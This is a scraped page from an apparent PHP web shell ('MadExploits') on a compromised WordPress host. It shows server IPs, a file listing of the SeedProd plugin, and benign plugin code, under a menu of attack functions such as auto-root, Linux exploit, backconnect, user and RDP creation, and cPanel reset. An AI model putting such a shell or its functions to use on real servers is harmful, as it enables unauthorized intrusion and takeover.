Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 3.141.30.159
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
temmmp /
besthealthsdeals.com /
wp-content /
plugins /
coming-soon /
app /
[ HOME SHELL ]
Name
Size
Permission
Action
backwards
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
admin-bar-menu.php
3.95
KB
-rw-r--r--
bootstrap.php
20.46
KB
-rw-r--r--
class-seedprod-notifications.p...
9.63
KB
-rw-r--r--
class-seedprod-review.php
5.97
KB
-rw-r--r--
cpt.php
541
B
-rw-r--r--
edit_with_seedprod.php
21.61
KB
-rw-r--r--
functions-addons.php
17.51
KB
-rw-r--r--
functions-envira-gallaries.php
799
B
-rw-r--r--
functions-inline-help.php
5.3
KB
-rw-r--r--
functions-openai.php
16.53
KB
-rw-r--r--
functions-rafflepress.php
1.86
KB
-rw-r--r--
functions-seedprod-gallery.php
7
B
-rw-r--r--
functions-utils.php
258.71
KB
-rw-r--r--
functions-wpforms.php
1.6
KB
-rw-r--r--
import-cross-site-functions.ph...
3.2
KB
-rw-r--r--
license.php
5.43
KB
-rw-r--r--
load_controller.php
1.69
KB
-rw-r--r--
lpage.php
34.91
KB
-rw-r--r--
nestednavmenu.php
5.09
KB
-rw-r--r--
render-csp-mm.php
9.8
KB
-rw-r--r--
render-dynamic-tags.php
26.24
KB
-rw-r--r--
render-lp.php
1.15
KB
-rw-r--r--
routes.php
24.62
KB
-rw-r--r--
settings.php
4.9
KB
-rw-r--r--
setup-wizard.php
12.08
KB
-rw-r--r--
subscriber.php
2.63
KB
-rw-r--r--
theme-templates.php
39.34
KB
-rw-r--r--
wp-cli-functions.php
22.46
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : functions-wpforms.php
<?php /** * Get WP Forms. * * @return void */ function seedprod_lite_get_wpforms() { if ( check_ajax_referer( 'seedprod_nonce' ) ) { if ( ! current_user_can( apply_filters( 'seedprod_builder_preview_render_capability', 'edit_others_posts' ) ) ) { wp_send_json_error(); } $forms = array(); if ( function_exists( 'wpforms' ) ) { $forms = \wpforms()->form->get( '', array( 'order' => 'DESC' ) ); $forms = ! empty( $forms ) ? $forms : array(); $forms = array_map( function ( $form ) { $form->post_title = wp_html_excerpt( htmlspecialchars_decode( $form->post_title, ENT_QUOTES ), 100 ); return $form; }, $forms ); } wp_send_json( $forms ); } } /** * Get WP Form. * * @return void */ function seedprod_lite_get_wpform() { if ( check_ajax_referer( 'seedprod_nonce' ) && function_exists( 'wpforms_display' ) ) { if ( ! current_user_can( apply_filters( 'seedprod_builder_preview_render_capability', 'edit_others_posts' ) ) ) { wp_send_json_error(); } $form_id = filter_input( INPUT_GET, 'form_id', FILTER_SANITIZE_NUMBER_INT ); $form_title = filter_input( INPUT_GET, 'form_title', FILTER_VALIDATE_BOOLEAN ); $form_description = filter_input( INPUT_GET, 'form_description', FILTER_VALIDATE_BOOLEAN ); ob_start(); ?> <link rel='stylesheet' id='wpforms-full-css' href='<?php echo content_url(); ?>/plugins/wpforms-lite/assets/css/wpforms-full.css' media='all' /><?php // phpcs:ignore WordPress.WP.EnqueuedResources.NonEnqueuedStylesheet ?> <?php wpforms_display( $form_id, $form_title, $form_description ); wp_send_json( ob_get_clean() ); } }
Close